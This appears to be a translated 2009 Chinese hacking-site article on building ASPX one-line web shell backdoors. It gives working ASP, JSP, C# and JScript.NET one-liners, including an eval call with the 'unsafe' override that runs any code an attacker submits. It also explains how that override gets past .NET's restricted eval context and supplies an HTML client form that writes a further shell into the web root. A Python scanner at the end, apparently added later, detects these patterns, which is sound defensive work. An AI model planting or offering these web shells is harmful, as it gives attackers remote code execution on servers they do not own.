ASPX one-line script Trojan: detailed analysis - vulnerability warning - the black bar safety net

ID MYHACK58:62200923420
Type myhack58
Reporter 佚名 (Anonymous)
Modified 2009-06-01T00:00:00


Source: evil octal

First, recall the classic ASP one-line Trojan:

    <%if request("nonamed")<>"" then execute request("nonamed")%>

VBScript's execute runs the specified code dynamically, and JScript has an eval function that achieves the same thing, so the ASP one-liner also has a version that uses JScript's eval. There are examples all over the Internet, so I will not say more.

Then the interpreted languages evolved into intermediate-code languages such as Java and .NET, and dynamic execution no longer exists there! Classic ASP usually supported only VBScript and JScript (exceptions like Python and PerlScript aside, which I will not go into). Today ASPX supports VB, the advanced version of VBScript, and VB does not have the unique execute method... Really sorry... JScript likewise moved on to an advanced version, but the eval function we need survives! Script kiddies are in luck... Let me bury that foreshadowing first.

First, let's talk about today's intermediate-language web one-liners. JSP:

    <% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>

This is my own writing, put out to play with; everyone knows it, so I won't explain it. ASPX:

    <%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close();%>

I don't know whose work this is, but it feels a lot like my JSP one-liner! Still, it plants a simple shell, which deserves support... Both one-liners are essentially the same: they call the class that receives the request and write the received content to a file. It is simply a file write operation, nothing more!~

Has the former glory of the ASP one-liner reached its limit and vanished in the intermediate-language backdoors? Wrong!... In ASPX a client/server Trojan like the ASP one can still be achieved, because JScript.NET exists! As said above, the eval function survives!~

OK, let's start building it:

    <%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["nonamed"]));%>

Like this? Yes! Save it as text.aspx and try submitting <>(); and it prints the current time: Sat Aug 4 20:05:20 UTC+8 2007. Looks OK! Now try again with <>("."); and the page reports an error!... (I got stuck right here and tossed around for a few months, otherwise this article would have been baked earlier! Thanks here to の Warlock, QQ: 4659675; everyone is welcome to go and learn from him... ha.) The cause of the error:

    Security exception
    Description: The application attempted to perform an operation not allowed by the security policy. To grant this application the required permission, contact your system administrator or change the application's trust level in the configuration file.
    Exception details: System.Security.SecurityException: Request failed.

Why is that? OK, we found the MS documentation; see below: <> ... /jsmscStartPage.asp

JScript .NET: new features. JScript .NET is the next generation of the Microsoft JScript language; it is a fast and easy way to access the Microsoft .NET platform with a Web language. JScript's main roles are constructing Web sites with ASP.NET and scripting custom applications with the .NET Framework. JScript .NET complies with the ECMAScript standard, but it also has features that ECMAScript does not specify, such as true compiled code, cross-language support through compliance with the Common Language Specification (CLS), and access to the .NET Framework. The JScript .NET version in Visual Studio .NET 2002 makes full use of the .NET Framework's own security, and JScript .NET 2003 adds a restricted security context for the eval method, further enhancing security. Several new features of JScript .NET are designed to take full advantage of the CLS, a set of rules that standardizes data types, objects, public methods, object interoperability patterns and so on. Classes, objects and components created in JScript .NET can be used by any CLS-compliant language. As a JScript developer, you can access classes, components and objects from other CLS-compliant programming languages without considering language-specific differences such as data types. JScript .NET programs use some CLS features, including namespaces, properties, reference parameters and native arrays.

Some of the new features of JScript .NET:

New in JScript .NET 2003: restricted security context for the eval method. To enhance security, the built-in eval method now runs scripts in a restricted security context by default, regardless of the caller's permissions. Passing "unsafe" as the optional second parameter to eval makes the script run with the caller's permissions, which allows access to the file system, network or user interface. For more information, see the eval method.

New in JScript .NET 2002:

Class-based objects. JScript .NET, like JScript, supports inheritance through prototype-based objects. JScript .NET also allows a class statement to define the data and behaviour of an object, thus supporting class-based objects. Classes created in JScript .NET can be used and extended by any .NET language. A class can inherit the properties and methods of a base class. Attributes can be applied to classes and class members to modify their behaviour and visibility. For more information, see class-based objects.

JScript data types. In JScript .NET, as in JScript, you can write a program without specifying the data types of variables. JScript .NET can also be used as a strongly typed language in which every variable is bound to a specific data type, or you can mix typed and untyped variables. JScript .NET provides many new data types; classes and .NET types can also be used as data types. For more information, see JScript data types.

Conditional compilation. Directives control how a JScript .NET program is compiled. For example, the @debug directive turns debugging information on or off for a specific part of the script (see the @debug directive), and the @position directive sets the current line number for the debugger (see the @position directive). These two directives are useful when you write code that will be merged into other scripts. For more information, see conditional compilation.

JScript namespaces. Namespaces prevent naming conflicts by organizing classes, interfaces and methods into a hierarchical structure. In JScript .NET you can define your own namespaces, and you can also access any .NET Framework namespace, including the ones you define yourself. The package statement lets a package of related classes be deployed easily while avoiding naming conflicts (see the package statement). The import statement makes a .NET Framework namespace available to a script so that the script can access the namespace's classes and interfaces (see the import statement).

JScript variables and constants. JScript .NET introduces the const statement, which defines an identifier that represents a constant value. For more information, see JScript variables and constants.

Enumerations. JScript .NET introduces the enum statement, which allows an enumerated data type to be constructed; an enumeration specifies names for the values of the data type. For more information, see the enum statement.

Then find the eval method: <> ... /html/jsmtheval.asp

JScript .NET eval method: evaluates JScript code and executes it.

    function eval(codeString : String [, override : String])

Parameters:
    codeString: Required. A string containing valid JScript code.
    override: Optional. A string that determines the code security permissions applied to codeString.

Remarks: the eval function allows dynamic execution of JScript source code. Code passed to the eval method executes in the same context as the call to the eval method. Note that new variables or types defined inside the eval statement are not visible to the enclosing program. Unless the string "unsafe" is passed as the second parameter, code passed to the eval method executes in a restricted security context. The restricted security context prohibits access to system resources such as the file system, network or user interface; if the code attempts to access these resources, a security exception is raised. When the string "unsafe" is passed as the second argument to the eval method, the code executes in the security context of the calling code. The second parameter is case-sensitive, so the strings "Unsafe" or "UnSAfE" will not override the restricted security context. Security note: in unsafe mode, eval should only be used to execute code strings obtained from a trusted source.

So the original eval is restricted for security. Oh well, then we do as it says and add the unsafe parameter:

    <%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["z"],"unsafe"));%>

OK, submit <>(".") and it prints F:\nonamed\DOTNETPROJECT, my current web directory: success! Tears of joy~~~ That is, whatever you submit, it runs, recovering the effect of the ASP backdoor of past years!~ -_- Response.Write is not required, but I added it in order to echo the output :)

OK, below we construct a client for the one-liner:

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <HTML>
    <HEAD>
    <TITLE>ASPX one line Code Client</TITLE>
    </HEAD>
    <BODY>
    <form action= aspx method=post>
    <textarea name=z cols=120 rows=10 width=45>
    var nonamed=new System.IO.StreamWriter(Server.MapPath("nonamed.aspx"),false);
    nonamed.Write(Request.Item["l"]);
    nonamed.Close();
    </textarea>
    <textarea name=l cols=120 rows=10 width=45>your code</textarea><BR><center><br>
    <input type=submit value=submit>
    </form>
    </BODY>
    </HTML>
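From the defender's side, the two backdoor shapes this article walks through (eval over request input with the "unsafe" override, and a StreamWriter that writes request data into the web root) are easy to fingerprint in ASPX source. The scanner below is an added example, not code from the article; the sample pages are constructed here for the demonstration, and the rule names are my own.

```python
import re

# Constructed samples modelled on the one-liners discussed in the article.
# They are scan input only; nothing here is executed.
SAMPLES = {
    "jscript_eval_unsafe.aspx": (
        '<%@ Page Language="Jscript"%>'
        '<%Response.Write(eval(Request.Item["z"],"unsafe"));%>'
    ),
    "csharp_filewriter.aspx": (
        '<%@ Page Language="C#" validateRequest="false" %>'
        '<%System.IO.StreamWriter ow=new System.IO.StreamWriter('
        'Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close();%>'
    ),
    "benign.aspx": (
        '<%@ Page Language="C#" %>'
        '<%Response.Write(Server.HtmlEncode(Request.QueryString["name"]));%>'
    ),
}

# Rule name plus compiled regex. Patterns tolerate whitespace because the
# source on disk may be minified or padded (the article's listing has stray spaces).
RULES = [
    # eval fed directly from the request object
    ("jscript-eval-on-request",
     re.compile(r'eval\s*\(\s*Request\b', re.IGNORECASE)),
    # only the exact lowercase "unsafe" lifts the restricted context, so this one is case-sensitive
    ("eval-unsafe-override",
     re.compile(r'eval\s*\([^)]*,\s*"unsafe"\s*\)')),
    # request data written into a file resolved under the web root
    ("request-written-to-file",
     re.compile(r'StreamWriter\s*\(\s*Server\.MapPath.*?\.Write\s*\(\s*Request\b', re.DOTALL)),
    # request validation switched off in the page directive
    ("validaterequest-disabled",
     re.compile(r'validateRequest\s*=\s*"false"', re.IGNORECASE)),
]

def scan_aspx(source):
    """Return the names of the rules that match one ASPX page's source text."""
    return [name for name, pattern in RULES if pattern.search(source)]

def scan_all(samples=SAMPLES):
    """Scan every sample and map its name to the rules it triggered."""
    return {name: scan_aspx(src) for name, src in samples.items()}

if __name__ == "__main__":
    for name, hits in scan_all().items():
        print(f"{name}: {hits or 'clean'}")
```

A hit on eval-unsafe-override alone is worth investigating even when eval is not fed from the request, since the override is the only thing that lets such code reach the file system.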